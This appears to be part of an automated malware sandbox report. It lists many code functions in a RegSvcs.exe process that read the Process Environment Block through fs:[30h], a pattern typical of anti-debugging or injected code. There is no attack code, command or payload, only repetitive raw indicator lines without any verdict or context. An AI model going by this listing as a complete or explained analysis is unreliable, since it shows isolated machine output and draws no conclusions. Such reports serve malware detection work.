Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01786030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01774000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01792000 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017320F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017760E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EC0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017720DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017B60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017B60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017880A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017BA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01798350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0177035C mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0177035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01772349 mov eax, dword ptr fs:[00000030h] (x15)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01710310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EC310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017263FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017AC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017763C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0171438F mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016E826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01778243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01778243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016E823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017862A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786500 mov eax, dword ptr fs:[00000030h]8_2_01786500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F25E0 mov eax, dword ptr fs:[00000030h]8_2_016F25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F65D0 mov eax, dword ptr fs:[00000030h]8_2_016F65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2582 mov eax, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2582 mov ecx, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E59C mov eax, dword ptr fs:[00000030h]8_2_0172E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01724588 mov eax, dword ptr fs:[00000030h]8_2_01724588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C460 mov ecx, dword ptr fs:[00000030h]8_2_0177C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171245A mov eax, dword ptr fs:[00000030h]8_2_0171245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA456 mov eax, dword ptr fs:[00000030h]8_2_017AA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E645D mov eax, dword ptr fs:[00000030h]8_2_016E645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC427 mov eax, dword ptr fs:[00000030h]8_2_016EC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F04E5 mov ecx, dword ptr fs:[00000030h]8_2_016F04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017244B0 mov ecx, dword ptr fs:[00000030h]8_2_017244B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F64AB mov eax, dword ptr fs:[00000030h]8_2_016F64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177A4B0 mov eax, dword ptr fs:[00000030h]8_2_0177A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AA49A mov eax, dword ptr fs:[00000030h]8_2_017AA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F8770 mov eax, dword ptr fs:[00000030h]8_2_016F8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01774755 mov eax, dword ptr fs:[00000030h]8_2_01774755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E75D mov eax, dword ptr fs:[00000030h]8_2_0177E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov esi, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0750 mov eax, dword ptr fs:[00000030h]8_2_016F0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176C730 mov eax, dword ptr fs:[00000030h]8_2_0176C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov ecx, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01720710 mov eax, dword ptr fs:[00000030h]8_2_01720710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C700 mov eax, dword ptr fs:[00000030h]8_2_0172C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F0710 mov eax, dword ptr fs:[00000030h]8_2_016F0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177E7E1 mov eax, dword ptr fs:[00000030h]8_2_0177E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016FC7C0 mov eax, dword ptr fs:[00000030h]8_2_016FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017707C3 mov eax, dword ptr fs:[00000030h]8_2_017707C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F07AF mov eax, dword ptr fs:[00000030h]8_2_016F07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017A47A0 mov eax, dword ptr fs:[00000030h]8_2_017A47A0
